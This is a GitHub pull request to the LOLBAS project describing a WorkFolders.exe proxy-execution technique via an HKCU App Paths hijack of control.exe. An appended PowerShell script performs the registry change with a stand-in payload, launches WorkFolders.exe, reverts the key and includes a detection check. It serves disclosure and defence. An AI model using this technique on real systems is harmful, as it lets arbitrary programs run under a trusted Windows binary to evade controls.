Add App Paths Hijacking (Proxy Execution) to WorkFolders.exe #490

Open

ghosts621 wants to merge 1 commit into LOLBAS-Project:master from ghosts621:patch-1

Conversation

@ghosts621

Hi team,

Submitting a new execution technique for `WorkFolders.exe`.

Currently, the existing technique relies on dropping a payload named `control.exe` into the Current Working Directory (CWD). 

**New Finding (App Paths Hijacking):**
By modifying the `(Default)` value of the `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe` registry key, `WorkFolders.exe` will seamlessly proxy-execute the arbitrary executable defined in the registry. 

* **Privileges:** User (HKCU modification requires no elevation).
* **POC:** I've attached a PowerShell POC in the Resources demonstrating the registry modification, execution, and clean-up.

Added the new command block, registry detection IOC, Gist resource link, and acknowledgement. Let me know if you need any adjustments!
ghosts621 requested a review from a team as a code owner on February 22, 2026 at 12:59
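The registry modification, execution and clean-up sequence the PR describes, as an added example for this thread. It is not the author's Gist POC and not LOLBAS project code. It assumes, as the PR states, that `WorkFolders.exe` resolves `control.exe` through the per-user `App Paths` key; it also assumes `notepad.exe` as a stand-in payload, `WorkFolders.exe` under `%SystemRoot%\System32`, and an ordinary (non-elevated) user session. The `Find-UserAppPathOverrides` helper is the defender-side counterpart: it lists per-user App Paths entries and flags `control.exe` (no legitimate per-user entry exists for it) or any target outside `%SystemRoot%` and Program Files.

```powershell
# Added example (not the PR author's POC, not LOLBAS code): App Paths hijack of control.exe
# as launched by WorkFolders.exe, with the registry change recorded, tested and reverted.
# Assumptions: WorkFolders.exe resolves "control.exe" via the per-user App Paths key as the
# PR claims; notepad.exe stands in for the payload; run as a normal user on Windows 10/11.

$KeyPath     = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe'
$Payload     = Join-Path $env:SystemRoot 'System32\notepad.exe'      # stand-in payload
$WorkFolders = Join-Path $env:SystemRoot 'System32\WorkFolders.exe'

function Get-ControlAppPath {
    # (Default) value of the hijack key, or $null when the key or value is absent.
    if (-not (Test-Path -LiteralPath $KeyPath)) { return $null }
    (Get-ItemProperty -LiteralPath $KeyPath).'(default)'
}

function Set-ControlAppPath([string]$Target) {
    # HKCU is writable by the user, so creating the key and setting (Default) needs no elevation.
    New-Item -Path $KeyPath -Force | Out-Null
    Set-ItemProperty -LiteralPath $KeyPath -Name '(Default)' -Value $Target
}

function Restore-ControlAppPath([bool]$KeyExisted, [string]$Previous) {
    # Put the key back exactly as it was: previous value, value-less key, or no key at all.
    if (-not (Test-Path -LiteralPath $KeyPath)) { return }
    if (-not $KeyExisted) {
        Remove-Item -LiteralPath $KeyPath -Recurse -Force
    } elseif ($null -eq $Previous) {
        Remove-ItemProperty -LiteralPath $KeyPath -Name '(Default)' -ErrorAction SilentlyContinue
    } else {
        Set-ItemProperty -LiteralPath $KeyPath -Name '(Default)' -Value $Previous
    }
}

function Invoke-WorkFoldersProxyTest {
    # Returns $true when the stand-in payload appears as a new process after WorkFolders.exe runs.
    $keyExisted = Test-Path -LiteralPath $KeyPath
    $original   = Get-ControlAppPath
    $started    = Get-Date
    try {
        Set-ControlAppPath -Target $Payload
        $wf = Start-Process -FilePath $WorkFolders -PassThru
        Start-Sleep -Seconds 3
        $hit = Get-Process -Name 'notepad' -ErrorAction SilentlyContinue |
               Where-Object { $_.StartTime -ge $started }
        # Close what we spawned so the test leaves no windows behind.
        $hit | Stop-Process -Force -ErrorAction SilentlyContinue
        $wf  | Stop-Process -Force -ErrorAction SilentlyContinue
        return [bool]$hit
    } finally {
        Restore-ControlAppPath -KeyExisted $keyExisted -Previous $original   # always clean up
    }
}

function Find-UserAppPathOverrides {
    # Defender-side check: per-user App Paths entries are rare; control.exe should never have one,
    # and any entry whose (Default) points outside %SystemRoot% or Program Files is suspicious.
    $root = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths'
    if (-not (Test-Path -LiteralPath $root)) { return @() }
    Get-ChildItem -LiteralPath $root | ForEach-Object {
        $target  = (Get-ItemProperty -LiteralPath $_.PSPath).'(default)'
        $trusted = ($target -like "$env:SystemRoot\*") -or ($target -like "$env:ProgramFiles\*")
        [pscustomobject]@{
            Name       = $_.PSChildName
            Target     = $target
            Suspicious = ($_.PSChildName -ieq 'control.exe') -or (-not $trusted)
        }
    }
}

if (Invoke-WorkFoldersProxyTest) {
    Write-Host "WorkFolders.exe launched the App Paths target: $Payload"
} else {
    Write-Host 'Payload did not start; WorkFolders.exe may not resolve control.exe via App Paths here.'
}
Find-UserAppPathOverrides | Where-Object Suspicious | Format-Table -AutoSize
```

Run it from any user prompt; the `finally` block restores the key even if `WorkFolders.exe` is missing or the launch fails. Because the example cleans up before the detection pass runs, `Find-UserAppPathOverrides` will report nothing afterwards; in an investigation, run it on its own, and alert on value writes to `HKCU\...\App Paths\control.exe` (Sysmon Event ID 13, RegistryEvent value set), since the key itself, not only its target, is the indicator.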